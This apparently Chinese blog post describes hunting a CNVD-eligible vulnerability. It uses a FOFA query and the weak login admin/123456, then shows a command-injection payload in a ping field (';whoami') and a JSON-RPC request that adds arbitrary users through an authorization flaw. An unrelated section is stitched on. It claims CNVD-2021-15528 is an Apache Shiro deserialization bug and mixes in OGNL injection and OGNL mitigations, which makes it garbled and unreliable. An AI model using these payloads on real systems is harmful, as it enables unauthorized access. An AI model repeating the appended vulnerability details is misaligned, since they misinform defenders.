2024-06-05-记一次cnvd渗透

前言:挖src挖郁闷了,闲来无事选择挖一个cnvd来练练手,本次的漏洞都没啥难度,企查查资产过了5000万

说一下cnvd证书的下放标准

对于中危及中危以上通用型漏洞(CVSS2.0基准评分超过4.0分),以及涉及党政机关、重要行业单位、科研院所、重要企事业单位(如:中央国有大型企业、部委直属事业单位等)的高危事件型漏洞(后续对事件型漏洞证明颁发标准将参考中央网信办颁布的关键基础设施相关定义和分类),CNVD将给予原创漏洞证明(即CNVD漏洞证书,电子版),该证明可通过编号在CNVD官方网站进行查询跟踪。时限要求:按周对上一周归档漏洞且满足证书颁发条件的进行批量制作。

事件型:高危 重要机构
通用型:中危及以上(评分4.0) 注册资金5000w以上,黑盒的测试案例10或以上(3复现+7其他案例,其他案例不要求复现),白盒的得有源码以及提供漏洞处代码调试过程,包含截图和原因。

过程:

fofa寻找目标

app=“xx目标系统”
在这里插入图片描述

admin ,123456 成功登录管理员用户(弱口令yyds)

RCE

在这里插入图片描述

发现这里有一个ping 的功能,我想这里应该会存在rce漏洞

ping 127.0.0.1 -c 4 ;whoami (成功rce)
在这里插入图片描述

在这里插入图片描述

越权

在这里插入图片描述

`POST xxxxxxxxx HTTP/1.1
Host: xxxxx
Content-Length: 180
Accept: application/json, text/plain, /
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: xxxxxxxxxxxxxxxxxxxx
Referer: xxxxxxxxxxxxxxxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{“jsonrpc”:“2.0”,“method”:“call”,“params”:[“635F7A20A38A4072899C14B3535CFBF5”,“admin”,“sessionAddUser”,{“username”:“123456”,“password”:“554e36b4db2bc61b606ca16e756b1f7d”}],“id”:11}`

这里将admin,换成任意用户即可添加成功
在这里插入图片描述

### CNVD-2021-15528 漏洞详情 CNVD-2021-15528 是针对 Apache Shiro 的反序列化远程代码执行漏洞。此漏洞允许未经身份验证的攻击者发送特制请求来触发 Java 反序列化过程中的代码执行,从而完全控制目标服务器。 #### 影响范围 该漏洞主要影响使用了 Apache Shiro 进行会话管理的应用程序,特别是当应用程序启用了 RememberMe 功能时更为危险。具体受影响版本包括但不限于: - Apache Shiro 1.2.x 至 1.7.x 版本 #### FOFA 查询语句 为了帮助安全研究人员定位可能存在风险的服务实例,提供了如下 FOFA 查询条件: ```plaintext "title="Shiro Session Manager"" ``` #### 漏洞复现环境搭建 要重现这个漏洞,通常需要满足以下几个前提条件: - 应用程序开启了 RememberMe 功能; - 攻击者能够获取到有效的 rememberMe cookie 值; - 存在一个可被利用的对象图导航语言 (OGNL) 表达式注入点[^1]。 ### 安全公告 国家信息安全漏洞共享平台(CNVD)于 2021 年发布了有关此漏洞的通知,并强调其严重性和潜在危害。鉴于该漏洞可能带来的严重影响以及广泛的存在性,强烈建议所有相关方尽快采取行动以减轻风险。 ### 补丁与修复方法 对于存在此类安全隐患的产品和服务提供商而言,最直接有效的方式就是升级至不受影响的新版软件。Apache 官方已经意识到这个问题,在后续发布的版本中解决了这一缺陷。因此推荐的做法是: - 升级到最新的稳定发行版,如 Apache Shiro 1.8 或更高版本。 如果无法立即完成上述操作,则应考虑实施临时缓解措施,比如禁用 RememberMe 功能或将 OGNL 解析器设置为只读模式等策略。 另外,还可以通过配置 Web Application Firewall(WAF) 来阻止可疑流量进入系统内部网络区域,以此作为额外一层防护手段[^2]。 ```bash # 更新依赖库至最新版本 mvn install -U ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值